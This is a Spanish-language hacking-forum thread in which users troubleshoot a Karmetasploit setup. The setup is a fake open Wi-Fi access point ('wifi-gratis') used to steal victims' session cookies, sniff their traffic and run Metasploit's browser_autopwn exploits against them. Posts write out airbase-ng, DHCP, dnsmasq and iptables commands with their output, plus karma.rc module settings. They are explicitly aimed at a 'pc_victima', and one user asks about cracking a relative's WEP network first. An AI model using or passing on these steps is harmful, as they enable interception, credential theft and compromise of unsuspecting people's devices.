Publicado por: Debci en 24 Enero 2010, 15:20 pm
Haber una duda, si aqui en la fila del fondo xD
ESto crea un punto de aceso wifi falso? o usa mi punto wifi (que por ejemplo se wlan_c6) entonces alguien se conecta y todo lo que haga bajo esa red lo recivo yo, pero que wifi usa, uno falso o el mio?

Saludos


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 25 Enero 2010, 15:49 pm
Haber una duda, si aqui en la fila del fondo xD
ESto crea un punto de aceso wifi falso? o usa mi punto wifi (que por ejemplo se wlan_c6) entonces alguien se conecta y todo lo que haga bajo esa red lo recivo yo, pero que wifi usa, uno falso o el mio?

Saludos

Utiliza tu tarjeta wireless para crear un AP falso, tu router (por ejemplo wlan_c6) sigue intacto

Saludos


Título: Re: [Metasploit] Karmetasploit
Publicado por: Snek35 en 1 Febrero 2010, 18:29 pm
pero si tienes un router AP conectado por lan al pc, solo habria que ejecutar el karma.rc no?


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 1 Febrero 2010, 22:41 pm
es indiferente que tengas un router o no.

Con un Pc y una wifi montas un AP falso desde donde el karma hace su trabajo

Si además tienes uans segunda tarjeta ethernet (o wifi) conectada a un router, pues podrás navegar y hacer tus cosas mientras en el otro dispositivo está karma ... además, montando un servidor DNS y con un par de reglas en las Iptables, podrías dar salida a Internet a los que entren a través de tu AP falso y, esnifar todos los datos ...


Título: Re: [Metasploit] Karmetasploit
Publicado por: Snek35 en 2 Febrero 2010, 14:25 pm
es indiferente que tengas un router o no.

Con un Pc y una wifi montas un AP falso desde donde el karma hace su trabajo

Si además tienes uans segunda tarjeta ethernet (o wifi) conectada a un router, pues podrás navegar y hacer tus cosas mientras en el otro dispositivo está karma ... además, montando un servidor DNS y con un par de reglas en las Iptables, podrías dar salida a Internet a los que entren a través de tu AP falso y, esnifar todos los datos ...
no me he explicado bien lo que digo es un router de esos que se ponen a un router antiguo para que tenga wifi, el AP solo tiene una entrada rj45, como el D_700APAirPlus, y por tanto se conectaria al ordenador


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 2 Febrero 2010, 15:12 pm
... un router de esos que se ponen a un router antiguo para que tenga wifi ...

Creo que sigues sin explicarte bien :D


Título: Re: [Metasploit] Karmetasploit
Publicado por: tragantras en 2 Febrero 2010, 16:50 pm
pero si tienes un router AP conectado por lan al pc, solo habria que ejecutar el karma.rc no?


vamos a ver el esquema es el siguiente


INTERNET ---> tu_router ---> tu_pc ~ AP VIRTUAL  <------ pc_victima


con tu pc creas una conexión AD-HOC al otro pc, que a través de ti reciviría ( o no, segun se configure ) acceso a internet. Está claro que si no tiene acceso a internet, de poco o NADA va a servir esto... pues la gracia es robar cookies sesiones en general y demás info.


Título: Re: [Metasploit] Karmetasploit
Publicado por: Snek35 en 2 Febrero 2010, 17:43 pm
... un router de esos que se ponen a un router antiguo para que tenga wifi ...

Creo que sigues sin explicarte bien :D
router conectado a la linea telefonica y luego otro conectado al router que es el AP  wifi, ejemplo:  DWL-G810

En cuanto a lo que dijo es INTERNET ---> tu_router ---> tu_pc -->AP  <------ pc_victima


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 2 Febrero 2010, 20:06 pm
vamos a ver el esquema es el siguiente

INTERNET ---> tu_router ---> tu_pc ~ AP VIRTUAL  <------ pc_victima

con tu pc creas una conexión AD-HOC al otro pc, que a través de ti reciviría ( o no, segun se configure ) acceso a internet. Está claro que si no tiene acceso a internet, de poco o NADA va a servir esto... pues la gracia es robar cookies sesiones en general y demás info.

Aunque no tengas el AP con conexión a Internet karma te sacará resultados. Piensa que una vez que la victima intente entrar a mail.google.com (por ejemplo) ya te manda las cookies aunque no tenga salida a Internet ... claro que si tuviera salida capturarías muchas más cosas

Sería:

router_internet ----> ((tarjeta fisica de tu PC --- tarjeta wifi de tu PC para el AP virtual)) <---- pc victima

donde el PC tiene dos tarjetas, una conectada a Internet a través del router o de un modem y la otra que crea un AP virtual ... de este modo configurarías el bind y las iptables para dar acceso a Internet a la victima

Pero lo que te decia es que si sólo tienes una tarjeta wifi sería:

tarjeta wifi de tu PC para el AP virtual <---- pc victima

y con eso te bastaría, aunque no le darías salida a Internet


Título: Re: [Metasploit] Karmetasploit
Publicado por: illera88 en 3 Febrero 2010, 23:34 pm
Citar
berto@ubuntu:~$ sudo apt-get install dhcpd3-server
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
E: No se pudo encontrar el paquete dhcpd3-server
Esto por que es :huh: :huh:
ya hice el
Citar
sudo apt-get update
Un saludo


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 3 Febrero 2010, 23:48 pm
Porque quiers que cuando se conecte alguien a tu AP se le asigne una IP ... si no estás en la misma red que él no puedes capturar datos.

El truco está en que se te crea un dispositivo virtual (at0) al que asignas la IP 10.0.0.1 (por ejemplo) y dejas el DHCPD arrancado con ese dispositivo de manera que cuando se conecte alguien a ese AP se le asignará una IP de ese rango (por ejemplo 10.0.0.100-254)


Título: Re: [Metasploit] Karmetasploit
Publicado por: illera88 en 4 Febrero 2010, 00:21 am
pero lo que pasa es que no se me instala el dhcp server. Me tira el error que te he copiado antes.
Un saludo y gracias


Título: Re: [Metasploit] Karmetasploit
Publicado por: pepeluxx en 4 Febrero 2010, 00:43 am
pero lo que pasa es que no se me instala el dhcp server. Me tira el error que te he copiado antes.
Un saludo y gracias

Prueba a poner:

$ sudo apt-get install dhcp3-server

sin la D  :)


Título: Re: [Metasploit] Karmetasploit
Publicado por: illera88 en 4 Febrero 2010, 11:48 am
pero lo que pasa es que no se me instala el dhcp server. Me tira el error que te he copiado antes.
Un saludo y gracias

Prueba a poner:

$ sudo apt-get install dhcp3-server

sin la D  :)
Funcionó!! Gracias crack ;);)


Título: Re: [Metasploit] Karmetasploit
Publicado por: trashhgoo en 20 Febrero 2010, 17:25 pm
Si, bueno, es una erratilla de nada. :P
Lo modificaría, pero tiene que hacerlo algún mod o el mismo Shell Root


Título: Re: [Metasploit] Karmetasploit
Publicado por: nnooxx en 3 Marzo 2010, 19:32 pm
Bueno el mensaje ya es un poco viejo pero aun asi nunca es tarde para agradecer un buen trabajo no XDXD Muy bueno muchas gracias  ;-)  ;-)


Título: Re: [Metasploit] Karmetasploit
Publicado por: xv0 en 5 Marzo 2010, 16:26 pm
Hola  trashhgoo

Gracias por este buen trabajo, podria hacer esto con la red de mi tio que es wep, siguiendo los mismos pasos, pero haciendo todo desde mi ordenador, reventandole la red con aircrack-ng y hacer esos pasos, funcionaria?

Un saludo crack


Título: Re: [Metasploit] Karmetasploit
Publicado por: Marmol en 13 Junio 2010, 22:00 pm
buenas tengo una duda me pasa esto despues de poner el sigiente comando   msfconsole -r' /opt/metasploit3/msf3/karma.rc'        me pone luego esto ./opt/metasploit3/app/ruby: 1: Syntax error: "(" unexpected gracias por la paciencia que teneis con los novatos


Título: Re: [Metasploit] Karmetasploit
Publicado por: Marmol en 27 Junio 2010, 21:58 pm
ok ya lo solucione por si alguien le sirve me ayudo este video http://www.youtube.com/watch?v=Ne7hof-w0kU   


Título: Re: [Metasploit] Karmetasploit
Publicado por: memory_corruption en 16 Septiembre 2010, 12:10 pm
Simplemente brillante! ;-)


Título: Re: [Metasploit] Karmetasploit
Publicado por: programacionlinux en 2 Octubre 2010, 03:43 am
fantastico !!! impecable !!!


Título: Re: [Metasploit] Karmetasploit
Publicado por: Rafa2011 en 14 Marzo 2011, 23:41 pm
Segui sus instrucciones paso a paso y no consigo resultados. Uso backtrack RD2. Solo quiero conseguir crear un AP Falso que de servicio de internet.

Tengo internet mediante ethernet (eth0) y wlan0 para ponerla en modo monitor, la cual me crea mon0.

Creo el AP Falso, con otra computadora detecto la señal falsa, me conecto, pero me asigna la ip: 169.254.153.82

Pense que era error de dhcp3-server y procedi a parar el servicio e instalar dnsmasq, y sucede lo mismo, la maquina cliente obtiene la ip: 169.254.153.82

Se me hace extraño puesto que el rango del cual debe tomar la ip es: 192.168.4.1 -192.168.4.250

COmo puedo comprobar que mi dhcp server esta en funcionamiento y entregando las ips dentro del rango ?

Que estoy haciendo mal?

Si les sirve, aqui les dejo lo que he hecho:

El dnsmasq ya lo tengo corriendo con la siguiente dnsmasq.conf:

interface=at0

dhcp-range=192.168.4.1,192.168.4.250,12h

despues escribo en la terminal:

~# airmon-ng start wlan0
Interface Chipset Driver

wlan0 Broadcom b43 – [phy0]
(monitor mode enabled on mon0)

~# airbase-ng -P -C 2 -c 6 –essid “wifi-gratis” mon0
06:33:53 Created tap interface at0
06:33:53 Trying to set MTU on at0 to 1500
06:33:53 Trying to set MTU on mon0 to 1800
06:33:53 Access Point with BSSID 00:1C:26:AB:E0:EF started.
06:34:54 Client 00:23:6C:17:2A:E3 associated (unencrypted) to ESSID: “wifi-gratis”

Ya esta corriendo el AP falso, ya tambien esta corriendo el dnsmasq, asi que solo hago:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Despues procedo con otra computadora o iphone conectarme a la red wifi falsa y le asigna la ip:169.254.153.82

Por consiguiente no me logro conectar.

Gracias de antemano por su colaboracion y/o apoyo.



Título: Re: [Metasploit] Karmetasploit
Publicado por: manmass en 17 Marzo 2011, 15:04 pm
Hola chicos,

por mi parte todo correcto. Muy buen trabajo.

Lo que he estado investigando es que nada más ejecutarse y levantar todos los exploits no dejan de entrarme mensajes a toda pastilla y no soy capaz de verlos a no ser que corte el proceso. Y ni si quiera hay nadie conectado!!!!

ME podéis iluminar? puedo redirigir la salida del karma a un fichero?

Gracias mákinas


Título: Re: [Metasploit] Karmetasploit
Publicado por: manmass en 18 Marzo 2011, 12:26 pm
Hola chicos,

por mi parte todo correcto. Muy buen trabajo.

Lo que he estado investigando es que nada más ejecutarse y levantar todos los exploits no dejan de entrarme mensajes a toda pastilla y no soy capaz de verlos a no ser que corte el proceso. Y ni si quiera hay nadie conectado!!!!

ME podéis iluminar? puedo redirigir la salida del karma a un fichero?

Gracias mákinas


Hola de nuevo,

ya he descubierto por qué se me inundaba de mensajes la pantalla y seguro que a muchos de vosotros con Ubuntu os ocurre lo mismo.
Después de hacer muchas pruebas descubrí que uno de los servidores que levanta karma.rc, en concreto el 5353 (mdns) se estaba pegando de leches con un servicio nativo de Ubuntu para poder resolver direcciones locales sin necesidad de tener un dns en la red, llamado "avahi-daemon". Simplemente parando el servicio y deshabilitándolo para que no levante cuando reinicias la máquina suficiente. Ahora veo la consola sin problemas y puedo operar.

Enlace:

http://viviendolared.blogspot.com/2010_04_01_archive.html

Saludos


Título: Re: [Metasploit] Karmetasploit
Publicado por: manmass en 18 Marzo 2011, 16:23 pm
Segui sus instrucciones paso a paso y no consigo resultados. Uso backtrack RD2. Solo quiero conseguir crear un AP Falso que de servicio de internet.

Tengo internet mediante ethernet (eth0) y wlan0 para ponerla en modo monitor, la cual me crea mon0.

Creo el AP Falso, con otra computadora detecto la señal falsa, me conecto, pero me asigna la ip: 169.254.153.82

Pense que era error de dhcp3-server y procedi a parar el servicio e instalar dnsmasq, y sucede lo mismo, la maquina cliente obtiene la ip: 169.254.153.82

Se me hace extraño puesto que el rango del cual debe tomar la ip es: 192.168.4.1 -192.168.4.250

COmo puedo comprobar que mi dhcp server esta en funcionamiento y entregando las ips dentro del rango ?

Que estoy haciendo mal?

Si les sirve, aqui les dejo lo que he hecho:

El dnsmasq ya lo tengo corriendo con la siguiente dnsmasq.conf:

interface=at0

dhcp-range=192.168.4.1,192.168.4.250,12h

despues escribo en la terminal:

~# airmon-ng start wlan0
Interface Chipset Driver

wlan0 Broadcom b43 – [phy0]
(monitor mode enabled on mon0)

~# airbase-ng -P -C 2 -c 6 –essid “wifi-gratis” mon0
06:33:53 Created tap interface at0
06:33:53 Trying to set MTU on at0 to 1500
06:33:53 Trying to set MTU on mon0 to 1800
06:33:53 Access Point with BSSID 00:1C:26:AB:E0:EF started.
06:34:54 Client 00:23:6C:17:2A:E3 associated (unencrypted) to ESSID: “wifi-gratis”

Ya esta corriendo el AP falso, ya tambien esta corriendo el dnsmasq, asi que solo hago:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Despues procedo con otra computadora o iphone conectarme a la red wifi falsa y le asigna la ip:169.254.153.82

Por consiguiente no me logro conectar.

Gracias de antemano por su colaboracion y/o apoyo.



Hola, se me ocurren varias cosas....

La primera es que de momento no probaría a activar la línea de iptables para poder dar salida a Internet, ya que creo que tu problema es anterior a todo eso, por tanto iría quitando pasos.

Ejecutaría netstat -atun y comprobaría que el dhcp está corriendo. Tendría que salir algo así:

udp        0      0 0.0.0.0:67              0.0.0.0:*                         
udp        0      0 0.0.0.0:68              0.0.0.0:*

El puerto importante es el 67 ya que es la parte servidora. El cliente dhcp usa el 68.

Si no ves estos puertos es que tienes un problema levantando el servicio del dhcp.

Por otro lado pienso que tu problema es exactamente ese, porque dice que ves el ap fake y te conectas pero después te pondrá algo así como "Conexión limitada" en Windows, verdad?. Windows (a partir de W2000 creo) te asigna una dirección apipa (169.254.x.x) cuando no encuentra un servidor dhcp para que pueda levantar todos los servicios de red.

Además puedes poner un sniffer en el interface para ver que efectivamente están llegando dichas solicitudes:

tcpdump -ni at0 -v

Espero que puedas avanzar en tu problema.  :-*

Saludos.


Título: Re: [Metasploit] Karmetasploit
Publicado por: Rafa2011 en 26 Marzo 2011, 21:15 pm
Estimado amigo, ya vi cual es mi problema pero no se como resolverlo, me di cuenta de lo siguiente:

Cuando "estoy conectado a internet" (como ahora) hago netstat -atun

y sale:

udp        0      0 0.0.0.0:67              0.0.0.0:*
udp        0      0 0.0.0.0:68              0.0.0.0:*


Pero cuando me desconecto de internet para hacer las pruebas con el access point falso

Sale:

udp        0      0 0.0.0.0:67              0.0.0.0:*


¿como puedo resolver este problema?


Título: Re: [Metasploit] Karmetasploit
Publicado por: wollvar en 4 Abril 2011, 06:55 am
mira no me arranca el dhcp3-server lo hago de esta forma

/etc/init.d/dhcp3-server start

me dice lo sgte

root@bt:~# /etc/init.d/dhcp3-server start Starting DHCP server: dhcpd3* check syslog for diagnostics.
 failed!

no se en que puedo estar fallando si me pudieran ayudar muchas gracias




Título: Re: [Metasploit] Karmetasploit
Publicado por: manmass en 17 Abril 2011, 19:43 pm
Estimado amigo, ya vi cual es mi problema pero no se como resolverlo, me di cuenta de lo siguiente:

Cuando "estoy conectado a internet" (como ahora) hago netstat -atun

y sale:

udp        0      0 0.0.0.0:67              0.0.0.0:*
udp        0      0 0.0.0.0:68              0.0.0.0:*


Pero cuando me desconecto de internet para hacer las pruebas con el access point falso

Sale:

udp        0      0 0.0.0.0:67              0.0.0.0:*


¿como puedo resolver este problema?


Mira, la única cosa que se me ocurre por qué te desaparece la línea del puerto 68 (parte cliente dhcp) es que al conectarte a Internet lo hagas con una ip fija de tu equipo y no obteniéndola de un dhcp real de tu adsl. Si esto es así, es normal. No hay ningún problema, o al menos yo no lo veo.


Título: Re: [Metasploit] Karmetasploit
Publicado por: Rafa2011 en 17 Mayo 2011, 07:02 am
Hola amigos! con la novedad de que ya funciona bien mi dhcp, ya asigna ip a los clientes, el problema es que no les da internet. Aqui les pongo la info para ver si es posible que me ayuden.

La interface con internet es eth0 y tiene la ip 192.168.1.66 y netmask 255.255.255.0 que obtiene directamente del modem ADSL.

La interface que corre el dhcp es at0 y tiene la ip 10.0.0.1 y el netmask 255.255.255.0

A modo informativo les pongo el contenido de mi dhcpd.conf

option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}


Tambien en la terminal estoy poniendo estos comandos de iptables, pero no se, si estan bien:

iptables -t nat -A PREROUTING -i at0 -j REDIRECT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Ahora un resumen de lo que quiero:

Que la maquina cliente que se conecta a mi Access Point Falso tenga internet a traves de la interface eth0. ¿Como puedo lograrlo?


Título: Re: [Metasploit] Karmetasploit
Publicado por: xexudj89 en 7 Septiembre 2011, 23:14 pm
hola a todos me he metio en el mundo del karmetasploit xD y lo he probado en ubuntu y por ahora bien a que no he conseguido sesion de metarpreter,tambien quiero que el usuario que se conecte al ap falso pueda navegar para hacerlo mas real!y me gustaria saber si alguie lo ha conseguido hacer funcionar en backtrack 5 r1!

tambien estoy interesado en como incorporarlo a nuestro wifiway 2.0.X

saludos a todos y gracias!


Título: Re: [Metasploit] Karmetasploit
Publicado por: dieluck en 3 Enero 2012, 14:30 pm
holax buen dia a todos lo que pasa que al arrankar el karma.rc me sale esto en las primeraslineas

Código:
[-] Failed to load plugin from /opt/framework/msf3/plugins/db_sqlite3: no such file to load -- /opt/framework/msf3/plugins/db_sqlite3
resource (karma.rc)> db_create /root/karma.db
[-] Unknown command: db_create.
resource (karma.rc)> use auxiliary/server/browser_autopwn
resource (karma.rc)> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
resource (karma.rc)> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource (karma.rc)> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource (karma.rc)> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource (karma.rc)> set LPORT 45000
LPORT => 45000
resource (karma.rc)> set SRVPORT 55550
SRVPORT => 55550
resource (karma.rc)> set URIPATH /ads
URIPATH => /ads
resource (karma.rc)> run
y ia despues todo sale super bien en azulito jeje un saludo y muy buen aporte!!!!!! XD>

utilizo bt5 r1 a 64